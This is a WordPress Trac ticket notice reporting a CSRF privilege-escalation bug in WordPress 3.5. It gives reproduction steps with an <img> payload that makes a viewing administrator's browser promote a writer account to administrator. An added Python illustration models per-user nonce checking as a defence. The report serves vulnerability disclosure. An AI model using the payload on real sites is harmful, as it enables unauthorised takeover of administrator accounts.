[wp-trac] [WordPress Trac] #23004: Editor CSRF vulnerabilities discovered
WordPress Trac
noreply at wordpress.org
Wed Dec 19 12:55:48 UTC 2012
#23004: Editor CSRF vulnerabilities discovered
-----------------------------+--------------------------
Reporter: drssay | Type: defect (bug)
Status: new | Priority: normal
Milestone: Awaiting Review | Component: General
Version: 3.5 | Severity: critical
Keywords: |
-----------------------------+--------------------------
Reproduce
1. Log in as a user with writer (or editor) privileges.
-> example) user name "test", user id = 2
2. Input the syntax below in the visual editor.
{{{
<img src="http://localhost/wp-admin/users.php?s=&_wponce=7258002722&_wp_http_referer=%2Fwp-admin%2Fusers.php%3Fupdate%3Dpromote&action=-1&new_role=administrator&changeit=%EB%B3%80%EA%B2%BD&paged=1&users%5B%5D=2&action2=-1" alt="" />
}}}
The user number is passed in the parameter ''' users%5B%5D=2 '''
3. Log in as a user with administrator privileges.
-> example) user name "admin", user id = 1
4. User "admin" views the post written in step 2.
5. User "admin" sees the x-box image.
6. User "test" gains administrator privileges.
Attachments will be added
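As an added illustration (not part of the ticket and not WordPress's own code), a simplified model of a per-user nonce check for the request shape in the payload above: the nonce embedded in the image URL is one the low-privilege user obtained, so a server that binds nonces to the acting user and a time window rejects the request when it arrives from the administrator's browser. The secret, the "promote-users" action label and the window length are constructed assumptions; `_wpnonce` is the parameter name WordPress itself uses (the report's payload spells it `_wponce`).

```python
import hmac
import hashlib
import time
from urllib.parse import urlparse, parse_qs

SECRET = b"constructed-site-secret"   # stand-in for the site's secret key (constructed)
TICK_SECONDS = 12 * 3600              # nonce lifetime window (assumption)
ACTION = "promote-users"              # constructed action label for this handler

def _nonce_for_tick(tick, action, user_id):
    # HMAC over (window, action, user): the nonce only verifies for the same user
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:10]

def make_nonce(action, user_id, now=None):
    """Mint a nonce bound to the action, the user and the current time window."""
    now = time.time() if now is None else now
    return _nonce_for_tick(int(now // TICK_SECONDS), action, user_id)

def verify_nonce(nonce, action, user_id, now=None):
    """Accept the current or the previous window; compare in constant time."""
    now = time.time() if now is None else now
    for t in (now, now - TICK_SECONDS):
        expected = _nonce_for_tick(int(t // TICK_SECONDS), action, user_id)
        if hmac.compare_digest(nonce, expected):
            return True
    return False

def handle_bulk_role_change(url, acting_user_id, now=None):
    """Server-side handler for a users.php-style bulk role change.

    acting_user_id is the user whose browser sent the request (the logged-in
    administrator when the request is triggered by an <img> in a post), not the
    author of the post that embedded the URL.
    """
    params = parse_qs(urlparse(url).query)
    nonce = params.get("_wpnonce", [""])[0]
    if not verify_nonce(nonce, ACTION, acting_user_id, now):
        return "rejected: nonce was not minted for the acting user"
    targets = params.get("users[]", [])          # 'users%5B%5D' decodes to 'users[]'
    new_role = params.get("new_role", [""])[0]
    return f"promoted users {targets} to {new_role}"
```

A nonce minted while user 2 was logged in fails for user 1, so the embedded request is refused even though the administrator's session cookies accompany it.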
--
Ticket URL: <http://core.trac.wordpress.org/ticket/23004>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software